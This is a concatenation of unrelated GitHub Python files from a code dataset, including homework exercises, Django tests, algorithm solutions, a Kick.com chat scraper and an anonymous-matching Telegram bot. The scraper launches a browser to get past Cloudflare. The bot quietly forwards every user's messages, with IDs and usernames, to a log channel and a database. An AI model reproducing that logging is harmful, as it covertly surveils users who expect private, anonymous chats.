'LOGIN_screen'","repo_name":"p1zza/Timesheet_Otradnov","sub_path":"Forms/LaborantScreen.py","file_name":"LaborantScreen.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40446112327","text":"# *****************************************************\n#\n# Program Author: Frances Zhao\n# Completion Date: May 20 2021\n# Program Name: lesson19_6.py\n# Description: Write a function to “glue” two strings together. Write another function which reverses a string.\n# Now use those two functions to create a machine (third function) that glues together first two strings,\n# reverses the result, and then glues on a third string.\n#\n# *****************************************************\n# first function: glues two strings together\ndef glue_strings(string1, string2):\n glued = string1+string2\n return glued\n\n\n# second function: reverses a string\ndef reverse_string(string):\n return string[::-1]\n\n\n# third function: glues two strings, reverses it, and glues a third string\ndef glue_reverse(string1, string2, string3):\n glue = str()\n glue = string1 + string2\n reverse = glue[::-1]\n return reverse + string3\n\n# variable declaration\nstring = \"puppy\"\nstring1 = \"happy\"\nstring2 = \"kitten\"\nstring3 = \"rainbows\"\n\n# testing the three functions:\nprint(glue_strings(string1, string2))\nprint(reverse_string(string))\nprint(glue_reverse(string1, string2, string3))","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 19/lesson19_6.py","file_name":"lesson19_6.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29846670422","text":"#! /usr/bin/python\nimport argparse\nimport asyncio\n\nimport aiohttp\nimport orjson\nimport redis.asyncio as redis\nfrom aiohttp import ClientConnectorError\nfrom playwright.async_api import async_playwright\nfrom rich import print\nfrom selectolax.parser import HTMLParser\n\n# Kick.com API and WebSocket URLs\nBASE_URL = \"https://kick.com/api/v2/channels\"\nWS_URL = \"wss://ws-us2.pusher.com/app/eb1d5f283081a78b932c?protocol=7&client=js&version=7.6.0&flash=false\"\n\n# Create a Redis connection\ntry:\n\tr = redis.Redis(host='localhost', port=6379)\nexcept Exception as e:\n\tprint(f\"An error occurred when connecting to Redis: {e}\")\n\ndef parse_arguments():\n\tparser = argparse.ArgumentParser(description=\"Kick Chat Listener\")\n\tparser.add_argument(\"--channel\", type=str, required=True, help=\"Kick channel name\")\n\targs = parser.parse_args()\n\treturn args.channel\n\nasync def get_chatroom_id(channel_name: str):\n\turl = f\"{BASE_URL}/{channel_name}\"\n\tasync with async_playwright() as p:\n\t\ttry:\n\t\t\t# Launch a Chromium browser to bypass Cloudflare\n\t\t\tbrowser = await p.chromium.launch(headless=False)\n\t\t\tpage = await browser.new_page()\n\t\t\tawait page.goto(url)\n\t\t\thtml = HTMLParser(await page.content())\n\t\t\tawait browser.close()\n\n\t\t\t# Get the chatroom ID from the JSON\n\t\t\tchannel_data = orjson.loads(html.css_first(\"body\").text())\n\t\t\tchannel_id = channel_data[\"chatroom\"][\"id\"]\n\t\t\treturn channel_id\n\t\texcept Exception as e:\n\t\t\tprint(f\"An error occurred when getting chatroom id: {e}\")\n\t\t\treturn None\n\nasync def connect_to_kick_chat(chatroom_id: int, channel_name: str):\n\tasync with aiohttp.ClientSession() as session:\n\t\ttry:\n\t\t\tasync with session.ws_connect(WS_URL) as ws:\n\t\t\t\tprint(f\"Connected to {channel_name} chat, listening for messages...\")\n\t\t\t\tchatroom_subscribe_message = {\n\t\t\t\t\t\"event\": \"pusher:subscribe\",\n\t\t\t\t\t\"data\": {\"auth\": \"\", \"channel\": f\"chatrooms.{chatroom_id}.v2\"}}\n\t\t\t\tawait ws.send_str(orjson.dumps(chatroom_subscribe_message).decode())\n\n\t\t\t\tchannel_subscribe_message = {\n\t\t\t\t\t\"event\": \"pusher:subscribe\",\n\t\t\t\t\t\"data\": {\"auth\": \"\", \"channel\": f\"channel.{chatroom_id}\"}}\n\t\t\t\tawait ws.send_str(orjson.dumps(channel_subscribe_message).decode())\n\n\t\t\t\tasync for msg in ws:\n\t\t\t\t\tdata = orjson.loads(msg.data)\n\t\t\t\t\tif data.get(\"event\") == \"App\\\\Events\\\\ChatMessageEvent\":\n\t\t\t\t\t\tmessage_data = orjson.loads(data[\"data\"])\n\t\t\t\t\t\tmessage = {\n\t\t\t\t\t\t\t\"platform\": \"Kick\",\n\t\t\t\t\t\t\t\"channel\": data[\"channel\"],\n\t\t\t\t\t\t\t\"channel_name\": channel_name,\n\t\t\t\t\t\t\t\"message_id\": message_data[\"id\"],\n\t\t\t\t\t\t\t\"chatroom_id\": message_data[\"chatroom_id\"],\n\t\t\t\t\t\t\t\"content\": message_data[\"content\"],\n\t\t\t\t\t\t\t\"message_type\": message_data[\"type\"],\n\t\t\t\t\t\t\t\"created_at\": message_data[\"created_at\"],\n\t\t\t\t\t\t\t\"sender_id\": message_data[\"sender\"][\"id\"],\n\t\t\t\t\t\t\t\"username\": message_data[\"sender\"][\"username\"],\n\t\t\t\t\t\t\t\"slug\": message_data[\"sender\"][\"slug\"],\n\t\t\t\t\t\t\t\"color\": message_data[\"sender\"][\"identity\"][\"color\"],\n\t\t\t\t\t\t\t\"badges\": message_data[\"sender\"][\"identity\"][\"badges\"],\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\t# Publish data to the Redis channel\n\t\t\t\t\t\tawait r.publish(f'{channel_name}_chat', orjson.dumps(message))\n\t\texcept ClientConnectorError as e:\n\t\t\tprint(f\"Could not connect to the WebSocket: {e}\")\n\t\texcept Exception as e:\n\t\t\tprint(f\"An unexpected error occurred: {e}\")\n\nasync def main(channel_name):\n\tchatroom_id = await get_chatroom_id(channel_name)\n\tif chatroom_id is not None:\n\t\tprint(f\"Chatroom ID: {chatroom_id}\")\n\t\tawait connect_to_kick_chat(chatroom_id, channel_name)\n\nif __name__ == \"__main__\":\n\tchannel_name = parse_arguments()\n\tasyncio.run(main(channel_name))\n","repo_name":"karlhendrik/openprofile-analytics","sub_path":"services/kick-chat-agent/kick_agent.py","file_name":"kick_agent.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12345358201","text":"import json\n\nfrom rest_framework import status\nfrom rest_framework.test import APITransactionTestCase\n\nfrom api.models import Tag\n\n\nclass TagsAPITests(APITransactionTestCase):\n reset_sequences = True\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.tags_endpoint = '/api/tags/'\n cls.test_tag_url = cls.tags_endpoint + '1/'\n cls.not_existing_tag = cls.tags_endpoint + '2/'\n\n cls.empty_tags_list = []\n\n cls.test_tag = {\n \"name\": \"Завтрак\",\n \"color\": \"#E26C2D\",\n \"slug\": \"breakfast\"\n }\n\n cls.not_empty_tags_list = [\n {\n \"id\": 1,\n \"name\": \"Завтрак\",\n \"color\": \"#E26C2D\",\n \"slug\": \"breakfast\"\n }\n ]\n\n cls.tag_breakfast_data = cls.not_empty_tags_list[0]\n\n def create_tag(self):\n Tag.objects.create(\n name=self.test_tag['name'],\n color=self.test_tag['color'],\n slug=self.test_tag['slug']\n )\n\n def test_empty_tags_list(self):\n response = self.client.get(self.tags_endpoint)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n json.loads(response.content),\n self.empty_tags_list\n )\n\n def test_not_empty_tags_list(self):\n self.create_tag()\n response = self.client.get(self.tags_endpoint)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n json.loads(response.content),\n self.not_empty_tags_list\n )\n\n def test_get_test_tag(self):\n self.create_tag()\n response = self.client.get(self.test_tag_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n json.loads(response.content),\n self.tag_breakfast_data\n )\n\n def test_not_existing_tag_returns_404(self):\n response = self.client.get(self.not_existing_tag)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n","repo_name":"aybor/foodgram-project-react","sub_path":"backend/api/tests/test_tags.py","file_name":"test_tags.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352860817","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nPrint Binary Tree in Vertical Order OR\nPrint the Binary Tree in Vertical Order Path OR\nVertical order traversal of a Binary Tree. \nFind Vertical Sum of given Binary Tree\n'''\n# http://javabypatel.blogspot.jp/2015/10/print-binary-tree-in-vertical-order.html\n\nfrom collections import defaultdict\n\nclass Node(object):\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef vertical_order(root, level, record):\n record[level].append(root)\n if root.left != None:\n vertical_order(root.left, level-1, record)\n if root.right != None:\n vertical_order(root.right, level+1, record)\n\ndef echo(record):\n for level, lst in record.items():\n print(level) \n for obj in lst:\n print(' ', obj.val)\n\ntree = Node(1, Node(2, Node(4), Node(5)), Node(3, Node(6), Node(7)))\nrecord = defaultdict(list)\nvertical_order(tree, 0, record)\necho(record)\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"tree/vertical_order_of_a_tree.py","file_name":"vertical_order_of_a_tree.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"36018315797","text":"pesel = \"55030101193\"\nweights = [1, 3, 7, 9, 1, 3, 7, 9, 1, 3]\n\nlength = len(weights)\n\nsum = 0\nfor i in range(length):\n sum += int(pesel[i]) * weights[i]\n\nchecksum = 10 - sum % 10\nprint(checksum)\n","repo_name":"rajchelm/python-academy","sub_path":"basics/loops_and_conditions/pesel_calculation.py","file_name":"pesel_calculation.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19450565488","text":"from PySide6.QtWidgets import QLayoutItem\n\nfrom declare_foundation.components import BaseComponent as _Base\n\n\nclass BaseComponent(_Base):\n \n def _enter_extra(self):\n if isinstance(self, QLayoutItem):\n # 注意: 当 self 是 QLayoutItem 实例时, 必须在 __enter__ 时期立即让父\n # 组件添加它 (父组件调用 setLayout 方法). 否则, Application 在启动时\n # 会出现一个空白的小窗口 (这个小窗口就是未指定父组件时的 self), 小窗\n # 口直到父组件添加它后会以闪退的方式消失, 给用户造成 \"有什么窗口一闪\n # 而过\" 的感觉.\n from ..core import parent\n parent_com = parent.represents\n assert parent_com is not None\n parent_com.setLayout(self)\n \n def _exit_extra(self, child_com, parent_com):\n # PS: self is child_com, they are the same object\n if isinstance(self, QLayoutItem):\n return\n if parent_com is not None:\n if isinstance(parent_com, QLayoutItem):\n parent_com.addWidget(child_com)\n else:\n child_com.setParent(parent_com)\n if hasattr(self, 'show'):\n self.show()\n","repo_name":"likianta/declare-qt","sub_path":"declare_qt/components/base_component.py","file_name":"base_component.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22344276456","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on %(date)s\n\n@author: %(username)s\n\"\"\"\n\"\"\"\nCreated on %(data)s\n@title: Robins Magical Module\n@description: Module with generally useful functions.\n@author: RD Beerman\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\n Gaussian takes array and maxval to calculate array with gaussian function\n width is half std dev\n\"\"\"\ndef gaussian(array,maxval,center,width): \n arrayout = []\n for i in range(0,len(array)):\n value = array[i]\n val = maxval*np.exp((-((value-center)**2)/(2*width**2)))\n arrayout.append(val)\n return arrayout\n\n\"\"\"\n Same aus gaussian but plots it with argument for label, color and linestyle\n\"\"\"\ndef gaussianplot(array,maxval,center,width,label,color,linestyle): \n arrayout = []\n for i in range(0,len(array)):\n value = array[i]\n val = maxval*np.exp((-((value-center)**2)/(2*width**2)))\n arrayout.append(val)\n plt.plot(array,arrayout,label=label,color=color,linestyle=linestyle)\n plt.legend()\n return\n\n\"\"\"\n plot plots x and y automatically with labels\n\"\"\"\ndef plot(x,y,label,markertype,markersize,ylabel,xlabel):\n plt.plot(x,y,label=label,marker=markertype,markersize=markersize)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.legend()\n plt.grid()\n return\n\"\"\"\"\n Plots a polynomal with order with no extrapolation \n (between 1st and last value) with arguments for linestyle, label and color\n\"\"\"\ndef plotpolyfit(xarray,yarray,order,label,linestyle,color):\n trendlineparams = np.polyfit(xarray,yarray,order) #Find best fitting line parameters\n trendline = np.poly1d(trendlineparams)\n xtrend = np.linspace(xarray[0],xarray[len(xarray)-1])\n plt.plot(xtrend,trendline(xtrend),label=label,linestyle=linestyle,color=color)\n plt.legend()\n return\n","repo_name":"rdbeerman/rmm_python","sub_path":"rmm.py","file_name":"rmm.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73431820647","text":"\"\"\"\nPseudocode\nsort the array \nloop through the elements of the array and create a left pointer which is one greater\nthan the index of element and one from the right and see if it adds to 0, if greater \nmake right go less and if it is too less incriment the left \n\n\"\"\"\n\nclass Solution(object):\n def threeSum(self, nums):\n solList = set()\n nums = sorted(nums)\n print(nums)\n for i in range(len(nums)):\n j = i+1\n k = len(nums)-1\n while k>j and j 0:\n k-=1\n else:\n j+=1\n\n return solList","repo_name":"pbairol/leetcode","sub_path":"Three Sum 15/three_sum_1.py","file_name":"three_sum_1.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19481304075","text":"import logging\nimport asyncio\nimport random\nimport sqlite3\nimport string\n\n#aiogram и всё утилиты для коректной работы с Telegram API\nfrom aiogram import Bot, types\nfrom aiogram.utils import executor\nfrom aiogram.utils.emoji import emojize\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.types.message import ContentType\nfrom aiogram.utils.markdown import text, bold, italic, code, pre\nfrom aiogram.types import ParseMode, InputMediaPhoto, InputMediaVideo, ChatActions\nfrom aiogram.types import ReplyKeyboardRemove,ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nimport aiogram.utils.exceptions\nfrom aiogram.types.message import ContentTypes\n\n#конфиг с настройками\nimport config\nfrom database import dbworker\n\n\n#инициализируем базу данных\ndb = dbworker('db dumb1.db')\nprint('[i] Bot Succes')\n\n#инициализируем бота\nbot = Bot(token=config.TOKEN)\ndp = Dispatcher(bot,storage=MemoryStorage())\n\n#логирование\nlogging.basicConfig(filename=\"all_log.log\", level=logging.INFO, format='%(asctime)s - %(levelname)s -%(message)s')\nwarning_log = logging.getLogger(\"warning_log\")\nwarning_log.setLevel(logging.WARNING)\n\nfh = logging.FileHandler(\"warning_log.log\")\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\n\n\nwarning_log.addHandler(fh)\n\n#хендлер команды /start\n@dp.message_handler(commands=['start'],state='*')\nasync def start(message : types.Message, state: FSMContext):\n \n await state.finish()\n\n button_search = KeyboardButton('Cari pasangan🔍')\n\n button_info_project = KeyboardButton('Info')\n\n ranked = KeyboardButton('Chat Teratas')\n\n count_users = KeyboardButton('Total user👤')\n\n mark_menu = ReplyKeyboardMarkup()\n\n mark_menu.add(button_search,button_info_project,ranked,count_users)\n\n await bot.send_message(message.chat.id,'👋 Hallo!\\n\\nSaya bot mencari teman untuk kamu\\nSaya harap kamu bisa menemukan teman atau pasanganmu :)\\n\\nBot ini Belum bisa mengirim Foto, video, voice hanya bisa mengirim stiker:)\\n\\nJangan Lupa untuk bergabung ke grup t.me/caritemanh',reply_markup=mark_menu)\n\n@dp.message_handler(lambda message : message.text == 'Total user👤')\nasync def count_users(message : types.Message):\n await message.answer(f'Jumlah pengguna saat ini {int(db.count_user() * 1.5)} orang👤')\n\n@dp.message_handler(lambda message : message.text == 'Info' or message.text == 'Proyek' or message.text == 'Все ссылки на нас' or message.text == 'Pembuat bot👤',state='*')\nasync def about_project(message : types.Message):\n if message.text == 'Info':\n\n for_developers = KeyboardButton('Pembuat bot👤')\n\n back = KeyboardButton('Back')\n\n rules = KeyboardButton('Rules bot📌')\n\n mark_menu = ReplyKeyboardMarkup()\n\n mark_menu.add(for_developers,rules,back)\n\n await bot.send_message(message.chat.id,'Semua informasi ada disini👇',reply_markup=mark_menu)\n\n elif message.text == 'Pembuat bot👤':\n await message.answer('Cie Kepo yaa😂😂\\nRAHASIA')\n\n@dp.message_handler(commands=['rules'],state='*')\n@dp.message_handler(lambda message : message.text == 'Rules bot📌')\nasync def rules(message : types.Message):\n await message.answer('''📌Aturan di bot @chatjomblohalu2_bot\\n1. Tidak boleh share yang berbau pornografi!\\n2. Wajib join grup @caritemanh\\n3. Berkata sopan!\\n4. Bijak dalam menggunakan bot\\n\\n''')\n\n@dp.message_handler(commands=['search'],state='*')\n@dp.message_handler(lambda message: message.text == 'Cari pasangan🔍',state='*')\nasync def search(message : types.Message):\n try:\n if(not db.user_exists(message.from_user.id)): #если пользователя с таким telegram id не найдено\n db.add_user(message.from_user.username,message.from_user.id) #добавляем юзера в табличку дб\n\n male = KeyboardButton('Laki-Laki')\n\n wooman = KeyboardButton('Perempuan')\n\n back = KeyboardButton('Kembali')\n\n sex_menu = ReplyKeyboardMarkup(one_time_keyboard=True)\n\n sex_menu.add(male,wooman,back)\n\n await message.answer('Pilih jenis kelamin pasangan Anda!\\nSiapa yang kamu cari?',reply_markup=sex_menu)\n except Exception as e:\n warning_log.warning(e)\n\n\n@dp.message_handler(lambda message : message.text == 'Chat Teratas')\nasync def ranked(message : types.Message, state: FSMContext):\n ''' Функция для вывода рейтинга '''\n try:\n final_top = ''\n top_count = 0\n for i in db.top_rating():\n for d in i:\n top_count +=1\n if db.get_name_user(d) == None:\n rofl_list = ['\\nебааа#ь ты жёсткий😳','\\nвасап👋','\\nбро полегче там😮','\\nгений🧠','\\nреспект🤟']\n final_top = final_top + str(top_count) + ' Juara - :(нету ника' + ' - ' + str(db.get_count_all_msg(d)) + ' Pesan' + rofl_list[top_count-1] + '\\n'\n else:\n rofl_list = ['\\n>>Bagus Bisa Mencapai Rekor😳','\\n>>Lumayan Lah🙈','\\n>>Sedikit Menarik😮','\\n>>Jenius Kayanya🧠','\\n>>Jomblo pasti😂']\n final_top = final_top + 'Rangking ' + str(top_count) + ' - @' + str(db.get_name_user(d)) + ' - ' + str(db.get_count_all_msg(d)) + ' Pesan' + rofl_list[top_count-1] + '\\n'\n await message.answer(f'Peringkat Teratas Untuk saat ini\\nDalam menggunakan bot😎 :\\n\\n{final_top}')\n except Exception as e:\n warning_log.warning(e)\n\n#класс машины состояний\nclass Chating(StatesGroup):\n\tmsg = State()\n\n@dp.message_handler(lambda message: message.text == 'Laki-Laki' or message.text == 'Perempuan',state='*')\nasync def chooce_sex(message : types.Message, state: FSMContext):\n ''' Выбор пола для поиска '''\n try:\n if db.queue_exists(message.from_user.id):\n db.delete_from_queue(message.from_user.id)\n if message.text == 'Laki-Laki':\n db.edit_sex(True,message.from_user.id)\n db.add_to_queue(message.from_user.id,True)\n elif message.text == 'Perempuan':\n db.edit_sex(False,message.from_user.id)\n db.add_to_queue(message.from_user.id,False)\n else:\n db.add_to_queue(message.from_user.id,db.get_sex_user(message.from_user.id)[0])\n await message.answer('Tunggu Sebentar..Kami Sedang mencari Pasanganmu')\n\n #кнопки\n stop = KeyboardButton('❌Hentikan Obrolan')\n\n share_link = KeyboardButton('Kirim ID kamu😜')\n\n coin = KeyboardButton('Bikin pasanganmu baper🙈')\n\n menu_msg = ReplyKeyboardMarkup()\n\n menu_msg.add(stop,share_link,coin)\n\n while True:\n await asyncio.sleep(0.5)\n if db.search(db.get_sex_user(message.from_user.id)[0]) != None: #если был найден подходящий юзер в очереди\n try:\n db.update_connect_with(db.search(db.get_sex_user(message.from_user.id)[0])[0],message.from_user.id) #обновляем с кем общается юзер\n db.update_connect_with(message.from_user.id,db.search(db.get_sex_user(message.from_user.id)[0])[0])\n break\n except Exception as e:\n print(e)\n\n while True:\n await asyncio.sleep(0.5)\n if db.select_connect_with(message.from_user.id)[0] != None: #если пользователь законектился\n\n\n break\n\n\n try:\n db.delete_from_queue(message.from_user.id) #удаляем из очереди\n db.delete_from_queue(db.select_connect_with(message.from_user.id)[0])\n except:\n pass\n\n await Chating.msg.set()\n\n\n await bot.send_message(db.select_connect_with(message.from_user.id)[0],'Pasangan Ditemukan.. Silahkan mulai Obrolan💬',reply_markup=menu_msg)\n await message.answer('Pasangan Ditemukan... Silahkan mulai Obrolan💬',reply_markup=menu_msg)\n return\n except Exception as e:\n warning_log.warning(e)\n await send_to_channel_log_exception(message,e)\n\n\n@dp.message_handler(content_types=ContentTypes.TEXT)\n@dp.message_handler(state=Chating.msg)\nasync def chating(message : types.Message, state: FSMContext):\n ''' Функция где и происходить общения и обмен ТЕКСТОВЫМИ сообщениями '''\n try:\n\n next = KeyboardButton('➡️Mencari Pasangan Baru')\n\n back = KeyboardButton('Back')\n\n menu_msg_chating = ReplyKeyboardMarkup()\n\n menu_msg_chating.add(next,back)\n\n await state.update_data(msg=message.text)\n\n user_data = await state.get_data()\n\n if user_data['msg'] == 'Kirim ID kamu😜':\n if message.from_user.username == None:\n await bot.send_message(db.select_connect_with_self(message.from_user.id)[0],'Kamu belum mengatur Username, Silahkan atur username kamu...\\nDi pengaturan Telegran!')\n else:\n await bot.send_message(db.select_connect_with_self(message.from_user.id)[0],'Pasanganmu mengirimkan ID\\n@' + message.from_user.username)\n await message.answer('ID @' + message.from_user.username +str (' Sudah Terkirim \\nKePasanganmu😜'))\n\n elif user_data['msg'] == '❌Hentikan Obrolan':\n await message.answer('Obrolan dihentikan!',reply_markup=menu_msg_chating)\n await bot.send_message(db.select_connect_with(message.from_user.id)[0],'Obrolan dihentikan!',reply_markup=menu_msg_chating)\n db.update_connect_with(None,db.select_connect_with(message.from_user.id)[0])\n db.update_connect_with(None,message.from_user.id)\n\n elif user_data['msg'] == '➡️Mencari Pasangan Baru':\n await chooce_sex(message,state)\n\n elif user_data['msg'] == 'Bikin pasanganmu baper🙈':\n coin = random.randint(1,2)\n\n if coin == 1:\n coin = text(italic('Aku sayang kamu by❤️'))\n else:\n coin = text(italic('Aku pengen peluk kamu🙊'))\n\n await message.answer(coin,parse_mode=ParseMode.MARKDOWN)\n await bot.send_message(db.select_connect_with(message.from_user.id)[0],coin,parse_mode=ParseMode.MARKDOWN)\n\n elif user_data['msg'] == 'Home':\n await start(message,state)\n await state.finish()\n\n else:\n await bot.send_message(db.select_connect_with(message.from_user.id)[0],user_data['msg']) #отправляем сообщения пользователя\n db.log_msg(message.from_user.id,user_data['msg']) #отправка сообщений юзеров в бд\n db.add_count_msg(message.from_user.id) #добавление кол-ва сообщений в бд для рейтинга\n await send_to_channel_log(message)\n\n except aiogram.utils.exceptions.ChatIdIsEmpty:\n await state.finish()\n await start(message,state)\n except aiogram.utils.exceptions.BotBlocked:\n await message.answer('keluar dari bot!')\n await state.finish()\n await start(message,state)\n except Exception as e:\n warning_log.warning(e)\n await send_to_channel_log_exception(message,e)\n\n@dp.message_handler(content_types=ContentTypes.PHOTO,state=Chating.msg)\nasync def chating_photo(message : types.Message, state: FSMContext):\n ''' Функция где и происходить общения и обмен ФОТОГРАФИЯМИ '''\n try:\n await message.photo[-1].download('photo_user/' + str(message.from_user.id) + '.jpg')\n with open('photo_user/' + str(message.from_user.id) + '.jpg','rb') as photo:\n await bot.send_photo(db.select_connect_with(message.from_user.id)[0],photo,caption=message.text)\n except Exception as e:\n warning_log.warning(e)\n await send_to_channel_log_exception(message,e)\n\n@dp.message_handler(content_types=ContentTypes.STICKER,state=Chating.msg)\nasync def chating_sticker(message : types.Message, state: FSMContext):\n ''' Функция где и происходить общения и обмен CТИКЕРАМИ '''\n try:\n await bot.send_sticker(db.select_connect_with(message.from_user.id)[0],message.sticker.file_id)\n except Exception as e:\n warning_log.warning(e)\n await send_to_channel_log_exception(message,e)\n\n\n\n\n#хендлер для команды назад\n@dp.message_handler(commands=['back'])\n@dp.message_handler(lambda message : message.text == 'Kembali',state='*')\nasync def back(message : types.Message, state: FSMContext):\n ''' Функция для команды back '''\n await state.finish()\n await start(message,state)\n\n#логи в телеграм канал\nasync def send_to_channel_log(message : types.Message):\n await bot.send_message(-1001422742707,f'ID - {str(message.from_user.id)}\\nusername - {str(message.from_user.username)}\\nmessage - {str(message.text)}')\n\nasync def send_to_channel_log_exception(message : types.Message,except_name):\n await bot.send_message(-1001422742707,f'Ошибка\\n\\n{except_name}')\n\n\n#админка\n@dp.message_handler(lambda message: message.text.startswith('/sendmsg_admin'),state='*')\nasync def admin_send_msg(message : types.Message):\n if message.from_user.id in config.ADMIN_LIST:\n msg = message.text.split(',')\n await bot.send_message(int(msg[1]),'Pesan dari admin:\\n' + msg[2])\n else:\n await message.answer('Kamu bukan admin!')\n\n#хендлер который срабатывает при непредсказуемом запросе юзера\n@dp.message_handler()\nasync def end(message : types.Message):\n\t'''Функция непредсказумогого ответа'''\n\tawait message.answer('Saya hanya mengingatkan bahwa ada perintah /start dan /help')\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True,)\n","repo_name":"davi78/botanon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24617003765","text":"import re\nfrom typing import List\nfrom app.note.models import Note\n\n\nasync def add(data: str, title: str=None) -> Note:\n new_note = await Note.create(data=data, title=title)\n return new_note\n\n\nasync def get(id: int) -> Note:\n note = await Note.get_or_none(id=id)\n return note\n\n\nasync def get_all() -> List[Note]:\n notes = await Note.all()\n return notes\n\n\nasync def filter_by(text: str) -> List[Note]:\n notes = await Note.filter(data__icontains=text)\n return notes\n\n\nasync def update(note_to_update: Note, note_data: dict):\n for field_name in note_data:\n setattr(note_to_update, field_name, note_data.get(field_name))\n await note_to_update.save()\n return note_to_update\n","repo_name":"karthikasasanka/fastapi-tortoise-orm-postgresql","sub_path":"app/note/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"71438608488","text":"#!/usr/bin/env python\n\nfrom opentire import OpenTire\nfrom opentire.Core import TireState\nfrom opentire.Core import TIRFile\n\nimport numpy as np\n\nif __name__ == \"__main__\":\n\n # Initialize the tire model\n openTire = OpenTire()\n myTireModel = openTire.createmodel('PAC2002')\n\n # Initialize the tire state\n state = TireState()\n state['FZ'] = 1500\n state['IA'] = 0.0\n state['SR'] = 0.0\n state['SA'] = 0.0\n state['FY'] = 0.0\n state['V'] = 10.0\n state['P'] = 260000\n\n # Define the slip angle range\n slip_angles = np.arange(-12, 13, 1) * 3.14 / 180\n\n # Print out some pretty formatting\n print('OpenTire Slip Angle Sweep Demo\\n')\n print('{0:>10} | {1:>10} | {2:>10} | {3:>10} | {4:>10}'\n .format('SA [deg]',\n 'FZ [N]',\n 'FY [N]',\n 'MZ [Nm]',\n 'MX [Nm]'))\n print('=' * 62)\n\n # Calculate and print out the tire model outputs\n for sa in slip_angles:\n state['SA'] = sa\n myTireModel.solve(state)\n print('{0:>10.0f} | {1:>10.0f} | {2:>10.1f} | {3:>10.1f} | {4:>10.1f}'\n .format(state['SA'] * 180 / 3.14,\n state['FZ'],\n state['FY'],\n state['MZ'],\n state['MX']))\n\n","repo_name":"OpenTire/OpenTirePython","sub_path":"examples/SA_Sweep_Example.py","file_name":"SA_Sweep_Example.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"13749282656","text":"\"\"\"\n返回不重复的全排列\n\n输入: [1,1,2]\n输出:\n[\n [1,1,2],\n [1,2,1],\n [2,1,1]\n]\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n res = []\n path = []\n used = [False] * n\n\n nums.sort() # 先排序,同类元素会向量,剪枝好判断\n\n def dfs(depth):\n if depth == len(nums): # 已经到最后一层\n res.append(path[:]) # copy path 对象\n return\n # n 数字顺序,恰好为字典序\n for i in range(n):\n # 用 used 保存每个 i 使用状态,不必每次到 path 中去查找\n if used[i]: # 出现在 i 之前的元素\n continue\n\n # not used[i - 1] 回溯回来 刚刚撤掉选择, 表明同值的必须是 同层的兄弟结点\n if i > 0 and nums[i] == nums[i - 1] and not used[i - 1]:\n continue\n\n # 如果 i 还没用\n path.append(nums[i])\n used[i] = True # note: 如果在这里将 所有同值元素置为 True,会导致循环完,树的长度达不到 n\n\n # 寻找下一个元素\n dfs(depth + 1)\n # 回溯,重置状态\n path.pop() # 移除最后1个\n used[i] = False\n\n dfs(0)\n return res\n\n\ns = Solution()\na = s.permuteUnique([1, 2, 5, 5, 5])\nprint(len(a))\nprint(a)\n","repo_name":"Shuai-Xie/LeetCode","sub_path":"leetcode/47 全排列2.py","file_name":"47 全排列2.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7778835786","text":"class Solution:\n def pivotIndex(self, nums: List[int]) -> int:\n s = sum(nums)\n p = 0\n\n for i, v in enumerate(nums):\n\n if s - p * 2 == v:\n return i\n p += v\n\n return 